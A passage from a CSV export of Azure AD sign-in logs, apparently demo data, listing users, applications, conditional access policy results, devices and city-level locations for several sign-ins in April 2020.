'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:08,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",71aa5f40-2333-4930-9dde-1255f8005100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,71aa5f40-2333-4930-9dde-1255f8005100,SigninLogs,Sucess,32.32146072,34.85319901
+264,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:04.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,bc9bf6d9-49c4-460c-b943-497c13889088,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ac9a90bc-e2ad-45f7-b2a8-b415c6fe1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ac9a90bc-e2ad-45f7-b2a8-b415c6fe1200,SigninLogs,Failed,33.7984581,-84.38828278
+265,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:28.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c914479f-2068-0000-5683-40e6c2996640,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4aca3199-2681-43b9-9160-589c11f51200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,4aca3199-2681-43b9-9160-589c11f51200,SigninLogs,Sucess,33.7984581,-84.38828278
+266,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:28.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8e53896f-343f-4f31-b6f7-80029082a7f0,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8ad00b2e-7523-45f8-a6db-5c47f2391300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8ad00b2e-7523-45f8-a6db-5c47f2391300,SigninLogs,Sucess,33.7984581,-84.38828278
+267,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:30.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:34,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",2631c49b-42a9-4c42-b072-b6f3a0ad4b00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,2631c49b-42a9-4c42-b072-b6f3a0ad4b00,SigninLogs,Sucess,32.32146072,34.85319901
+268,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:49.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,23d82071-2998-4544-99f1-26efc8fefc8c,Microsoft.aadiam,Microsoft.aadiam,,Preeti Krishna,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 23:35,"{'operatingSystem': 'Windows 10', 'deviceId': '2b5ce400-46e8-497f-b04f-4fd16c0e0ea8', 'browser': 'Edge 18.1836', 'displayName': 'PREETIKR-SUR', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",af5715fa-7bd5-4e23-9ccf-3b38e32c0200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.17095184326172, 'latitude': 47.69049072265625}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],{'errorCode': 0},Preeti Krishna,9c124f6b-0d06-49b1-8509-ca2aab3d2038,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,af5715fa-7bd5-4e23-9ccf-3b38e32c0200,SigninLogs,Sucess,47.69049072,-122.1709518
+269,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:56.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d3aeb641-0896-4ec6-88a4-5da507f5648c,Microsoft.aadiam,Microsoft.aadiam,,Hagar Romach,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",d47bd47d-d635-40c8-a3b8-94af18a52400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.12094116210936, 'latitude': 47.68050003051758}, 'state': 'Washington', 'city': 'Redmond'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Hagar Romach,110d36ce-95b9-4ce4-a5cd-f79bbe4bbd9f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d47bd47d-d635-40c8-a3b8-94af18a52400,SigninLogs,Sucess,47.68050003,-122.1209412
+270,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:23.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:51,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",f2f44b4e-dca4-4132-bb34-875707851f00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f2f44b4e-dca4-4132-bb34-875707851f00,SigninLogs,Sucess,32.0840416,34.88776016
+271,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:30.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 